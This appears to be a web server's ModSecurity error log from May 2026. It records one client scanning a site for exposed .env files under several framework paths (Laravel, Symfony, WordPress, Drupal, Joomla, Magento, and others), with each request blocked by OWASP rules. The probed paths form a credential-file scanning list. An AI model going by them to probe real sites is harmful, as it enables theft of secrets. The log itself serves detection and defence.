[Mon May 11 16:33:33.673853 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/opt/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TAAAAQs"]
[Mon May 11 16:33:33.674246 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/opt/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TAAAAQs"]
[Mon May 11 16:33:33.674435 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/opt/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TAAAAQs"]
[Mon May 11 16:33:33.674692 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/opt/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TAAAAQs"]
[Mon May 11 16:33:33.830801 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/laravel/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TQAAAQs"]
[Mon May 11 16:33:33.831188 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/laravel/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TQAAAQs"]
[Mon May 11 16:33:33.831382 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/laravel/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TQAAAQs"]
[Mon May 11 16:33:33.831613 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/laravel/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TQAAAQs"]
[Mon May 11 16:33:33.988541 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/symfony/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TgAAAQs"]
[Mon May 11 16:33:33.988922 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/symfony/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TgAAAQs"]
[Mon May 11 16:33:33.989118 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/symfony/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TgAAAQs"]
[Mon May 11 16:33:33.989378 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/symfony/.env"] [unique_id "agHovUWKUxpmnkK7zHx_TgAAAQs"]
[Mon May 11 16:33:34.145901 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wordpress/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/wordpress/.env"] [unique_id "agHovkWKUxpmnkK7zHx_TwAAAQs"]
[Mon May 11 16:33:34.146287 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wordpress/.env"] [unique_id "agHovkWKUxpmnkK7zHx_TwAAAQs"]
[Mon May 11 16:33:34.146478 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wordpress/.env"] [unique_id "agHovkWKUxpmnkK7zHx_TwAAAQs"]
[Mon May 11 16:33:34.146702 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wordpress/.env"] [unique_id "agHovkWKUxpmnkK7zHx_TwAAAQs"]
[Mon May 11 16:33:34.302760 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/wp/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UQAAAQs"]
[Mon May 11 16:33:34.303138 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/wp/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UQAAAQs"]
[Mon May 11 16:33:34.303323 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/wp/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UQAAAQs"]
[Mon May 11 16:33:34.303583 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/wp/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UQAAAQs"]
[Mon May 11 16:33:34.460168 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cms/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UgAAAQs"]
[Mon May 11 16:33:34.460571 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cms/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UgAAAQs"]
[Mon May 11 16:33:34.460820 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cms/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UgAAAQs"]
[Mon May 11 16:33:34.461072 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cms/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UgAAAQs"]
[Mon May 11 16:33:34.617274 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /drupal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/drupal/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UwAAAQs"]
[Mon May 11 16:33:34.617671 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/drupal/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UwAAAQs"]
[Mon May 11 16:33:34.617863 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/drupal/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UwAAAQs"]
[Mon May 11 16:33:34.618120 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/drupal/.env"] [unique_id "agHovkWKUxpmnkK7zHx_UwAAAQs"]
[Mon May 11 16:33:34.774277 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /joomla/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/joomla/.env"] [unique_id "agHovkWKUxpmnkK7zHx_VAAAAQs"]
[Mon May 11 16:33:34.774660 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/joomla/.env"] [unique_id "agHovkWKUxpmnkK7zHx_VAAAAQs"]
[Mon May 11 16:33:34.774846 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/joomla/.env"] [unique_id "agHovkWKUxpmnkK7zHx_VAAAAQs"]
[Mon May 11 16:33:34.775094 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/joomla/.env"] [unique_id "agHovkWKUxpmnkK7zHx_VAAAAQs"]
[Mon May 11 16:33:34.829922 2026] [security2:error] [pid 1412074:tid 1412096] [client 43.131.45.213:59750] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pweil.com"] [uri "/"] [unique_id "agHovjJnyuKVXoStDha4FgAAAFQ"]
[Mon May 11 16:33:34.931847 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /magento/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/magento/.env"] [unique_id "agHovkWKUxpmnkK7zHx_VQAAAQs"]
[Mon May 11 16:33:34.932242 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/magento/.env"] [unique_id "agHovkWKUxpmnkK7zHx_VQAAAQs"]
